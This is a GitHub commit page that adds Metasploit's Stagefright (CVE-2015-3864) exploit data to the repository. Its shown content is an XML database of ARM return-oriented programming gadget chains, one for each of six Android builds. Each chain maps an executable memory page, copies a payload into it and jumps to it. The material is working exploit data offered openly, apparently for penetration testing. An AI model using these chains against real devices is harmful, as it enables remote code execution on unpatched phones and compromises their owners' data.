Skip to content

Commit a13e83a

Browse files
acammack-r7acammack-r7
committed
Land rapid7#7357, Stagefright CVE-2015-3864 
2 parents 00258a4 + dbf66f2 commit a13e83a

File tree

2 files changed

+1437
-0
lines changed

2 files changed

+1437
-0
lines changed

data/ropdb/stagefright.xml

Lines changed: 225 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,225 @@
1+
<?xml version="1.0" encoding="ISO-8859-1"?>
2+
<db>
3+
<rop>
4+
<compatibility>
5+
<target>lrx</target>
6+
</compatibility>
7+
8+
<gadgets base="0xb66a0000">
9+
<gadget value="junk">value to be skipped (r3)</gadget>
10+
<gadget value="junk">value to be skipped (r4)</gadget>
11+
<gadget offset="0x000042f9">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
12+
<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
13+
<gadget value="0x00001000">mmap64 length (1 page)</gadget>
14+
<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
15+
<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
16+
<gadget offset="0x001127b8">ptr to mmap64 (less 0x20)</gadget>
17+
<gadget value="junk">value to be skipped (r7)</gadget>
18+
<gadget offset="0x0008b7d9">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
19+
<gadget value="0xffffffff">mmap64 fd</gadget>
20+
<gadget value="0x00000000">mmap64 fd</gadget>
21+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
22+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
23+
<gadget value="junk">value to be skipped (r7)</gadget>
24+
<gadget offset="0x00058e63">pop {r4, pc}</gadget>
25+
<gadget offset="0x00110438">ptr to memcpy (less 0x20)</gadget>
26+
<gadget offset="0x00061597">pop {r1, r2, r7, pc}</gadget>
27+
<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
28+
<gadget value="size">memcpy length (payload size)</gadget>
29+
<gadget value="junk">value to be skipped (r7)</gadget>
30+
<gadget offset="0x0008b7d9">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
31+
<gadget value="junk">value to be skipped (r3)</gadget>
32+
<gadget value="junk">value to be skipped (r4)</gadget>
33+
<gadget value="junk">value to be skipped (r5)</gadget>
34+
<gadget value="junk">value to be skipped (r6)</gadget>
35+
<gadget value="junk">value to be skipped (r7)</gadget>
36+
<gadget offset="0x0002fed3">bx r0</gadget>
37+
</gadgets>
38+
</rop>
39+
40+
<rop>
41+
<compatibility>
42+
<target>lmy-1</target>
43+
</compatibility>
44+
45+
<gadgets base="0xb66a0000">
46+
<gadget value="junk">value to be skipped (r3)</gadget>
47+
<gadget value="junk">value to be skipped (r4)</gadget>
48+
<gadget offset="0x000bfdbf">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
49+
<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
50+
<gadget value="0x00001000">mmap64 length (1 page)</gadget>
51+
<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
52+
<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
53+
<gadget offset="0x001137b4">ptr to mmap64 (less 0x20)</gadget>
54+
<gadget value="junk">value to be skipped (r7)</gadget>
55+
<gadget offset="0x0008c269">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
56+
<gadget value="0xffffffff">mmap64 fd</gadget>
57+
<gadget value="0x00000000">mmap64 fd</gadget>
58+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
59+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
60+
<gadget value="junk">value to be skipped (r7)</gadget>
61+
<gadget offset="0x0000f379">pop {r4, pc}</gadget>
62+
<gadget offset="0x00111430">ptr to memcpy (less 0x20)</gadget>
63+
<gadget offset="0x000a1251">pop {r1, r2, r7, pc}</gadget>
64+
<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
65+
<gadget value="size">memcpy length (payload size)</gadget>
66+
<gadget value="junk">value to be skipped (r7)</gadget>
67+
<gadget offset="0x0008c269">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
68+
<gadget value="junk">value to be skipped (r3)</gadget>
69+
<gadget value="junk">value to be skipped (r4)</gadget>
70+
<gadget value="junk">value to be skipped (r5)</gadget>
71+
<gadget value="junk">value to be skipped (r6)</gadget>
72+
<gadget value="junk">value to be skipped (r7)</gadget>
73+
<gadget offset="0x000301a5">bx r0</gadget>
74+
</gadgets>
75+
</rop>
76+
77+
<rop>
78+
<compatibility>
79+
<target>lmy-2</target>
80+
</compatibility>
81+
82+
<gadgets base="0xb66a0000">
83+
<gadget value="junk">value to be skipped (r3)</gadget>
84+
<gadget value="junk">value to be skipped (r4)</gadget>
85+
<gadget offset="0x000bfe07">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
86+
<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
87+
<gadget value="0x00001000">mmap64 length (1 page)</gadget>
88+
<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
89+
<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
90+
<gadget offset="0x001137b4">ptr to mmap64 (less 0x20)</gadget>
91+
<gadget value="junk">value to be skipped (r7)</gadget>
92+
<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
93+
<gadget value="0xffffffff">mmap64 fd</gadget>
94+
<gadget value="0x00000000">mmap64 fd</gadget>
95+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
96+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
97+
<gadget value="junk">value to be skipped (r7)</gadget>
98+
<gadget offset="0x0000f379">pop {r4, pc}</gadget>
99+
<gadget offset="0x00111430">ptr to memcpy (less 0x20)</gadget>
100+
<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
101+
<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
102+
<gadget value="size">memcpy length (payload size)</gadget>
103+
<gadget value="junk">value to be skipped (r6)</gadget>
104+
<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
105+
<gadget value="junk">value to be skipped (r3)</gadget>
106+
<gadget value="junk">value to be skipped (r4)</gadget>
107+
<gadget value="junk">value to be skipped (r5)</gadget>
108+
<gadget value="junk">value to be skipped (r6)</gadget>
109+
<gadget value="junk">value to be skipped (r7)</gadget>
110+
<gadget offset="0x0000b3bd">bx r0</gadget>
111+
</gadgets>
112+
</rop>
113+
114+
<rop>
115+
<compatibility>
116+
<target>shamu / LYZ28E</target>
117+
</compatibility>
118+
119+
<gadgets base="0xb66a0000">
120+
<gadget value="junk">value to be skipped (r3)</gadget>
121+
<gadget value="junk">value to be skipped (r4)</gadget>
122+
<gadget offset="0x000bfe4f">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
123+
<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
124+
<gadget value="0x00001000">mmap64 length (1 page)</gadget>
125+
<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
126+
<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
127+
<gadget offset="0x0011e7b0">ptr to mmap64 (less 0x20)</gadget>
128+
<gadget value="junk">value to be skipped (r7)</gadget>
129+
<gadget offset="0x0008c279">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
130+
<gadget value="0xffffffff">mmap64 fd</gadget>
131+
<gadget value="0x00000000">mmap64 fd</gadget>
132+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
133+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
134+
<gadget value="junk">value to be skipped (r7)</gadget>
135+
<gadget offset="0x00044f71">pop {r4, pc}</gadget>
136+
<gadget offset="0x0011c42c">ptr to memcpy (less 0x20)</gadget>
137+
<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
138+
<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
139+
<gadget value="size">memcpy length (payload size)</gadget>
140+
<gadget value="junk">value to be skipped (r6)</gadget>
141+
<gadget offset="0x0008c279">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
142+
<gadget value="junk">value to be skipped (r3)</gadget>
143+
<gadget value="junk">value to be skipped (r4)</gadget>
144+
<gadget value="junk">value to be skipped (r5)</gadget>
145+
<gadget value="junk">value to be skipped (r6)</gadget>
146+
<gadget value="junk">value to be skipped (r7)</gadget>
147+
<gadget offset="0x0000f7cd">bx r0</gadget>
148+
</gadgets>
149+
</rop>
150+
151+
<rop>
152+
<compatibility>
153+
<target>shamu / LYZ28J</target>
154+
</compatibility>
155+
156+
<gadgets base="0xb66a0000">
157+
<gadget value="junk">value to be skipped (r3)</gadget>
158+
<gadget value="junk">value to be skipped (r4)</gadget>
159+
<gadget offset="0x000bfe07">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
160+
<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
161+
<gadget value="0x00001000">mmap64 length (1 page)</gadget>
162+
<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
163+
<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
164+
<gadget offset="0x0011e7b0">ptr to mmap64 (less 0x20)</gadget>
165+
<gadget value="junk">value to be skipped (r7)</gadget>
166+
<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
167+
<gadget value="0xffffffff">mmap64 fd</gadget>
168+
<gadget value="0x00000000">mmap64 fd</gadget>
169+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
170+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
171+
<gadget value="junk">value to be skipped (r7)</gadget>
172+
<gadget offset="0x00044f71">pop {r4, pc}</gadget>
173+
<gadget offset="0x0011c42c">ptr to memcpy (less 0x20)</gadget>
174+
<gadget offset="0x000042e9">pop {r1, r2, r6, pc}</gadget>
175+
<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
176+
<gadget value="size">memcpy length (payload size)</gadget>
177+
<gadget value="junk">value to be skipped (r6)</gadget>
178+
<gadget offset="0x0008c231">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
179+
<gadget value="junk">value to be skipped (r3)</gadget>
180+
<gadget value="junk">value to be skipped (r4)</gadget>
181+
<gadget value="junk">value to be skipped (r5)</gadget>
182+
<gadget value="junk">value to be skipped (r6)</gadget>
183+
<gadget value="junk">value to be skipped (r7)</gadget>
184+
<gadget offset="0x0000f83d">bx r0</gadget>
185+
</gadgets>
186+
</rop>
187+
188+
<rop>
189+
<compatibility>
190+
<target>sm-g900v / OE1</target>
191+
</compatibility>
192+
193+
<gadgets base="0xb66a0000">
194+
<gadget value="junk">value to be skipped (r3)</gadget>
195+
<gadget value="junk">value to be skipped (r4)</gadget>
196+
<gadget offset="0x00092b85">pop {r0, r1, r2, r3, r4, r7, pc}</gadget>
197+
<gadget value="0x00000000">mmap64 addres hint (none)</gadget>
198+
<gadget value="0x00001000">mmap64 length (1 page)</gadget>
199+
<gadget value="0x00000007">mmap64 protection (PROT_READ|PROT_WRITE|PROT_EXEC)</gadget>
200+
<gadget value="0x00000022">mmap64 flags (MAP_PRIVATE|MAP_ANONYMOUS)</gadget>
201+
<gadget offset="0x0017af08">ptr to mmap64 (less 0x20)</gadget>
202+
<gadget value="junk">value to be skipped (r7)</gadget>
203+
<gadget offset="0x000a7a41">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
204+
<gadget value="0xffffffff">mmap64 fd</gadget>
205+
<gadget value="0x00000000">mmap64 fd</gadget>
206+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
207+
<gadget value="0x00000000">mmap64 offset (64-bit)</gadget>
208+
<gadget value="junk">value to be skipped (r7)</gadget>
209+
<gadget offset="0x00065467">pop {r4, pc}</gadget>
210+
<gadget offset="0x0017a6e4">ptr to memcpy (less 0x20)</gadget>
211+
<gadget offset="0x0009f359">pop {r1, r2, r7, pc}</gadget>
212+
<gadget value="0xc600613c">memcpy src (address of payload)</gadget>
213+
<gadget value="size">memcpy length (payload size)</gadget>
214+
<gadget value="junk">value to be skipped (r7)</gadget>
215+
<gadget offset="0x000a7a41">ldr r4, [r4, #0x20] ; blx r4 ; pop {r3, r4, r5, r6, r7, pc}</gadget>
216+
<gadget value="junk">value to be skipped (r3)</gadget>
217+
<gadget value="junk">value to be skipped (r4)</gadget>
218+
<gadget value="junk">value to be skipped (r5)</gadget>
219+
<gadget value="junk">value to be skipped (r6)</gadget>
220+
<gadget value="junk">value to be skipped (r7)</gadget>
221+
<gadget offset="0x0000c409">bx r0</gadget>
222+
</gadgets>
223+
</rop>
224+
225+
</db>

0 commit comments

Comments
 (0)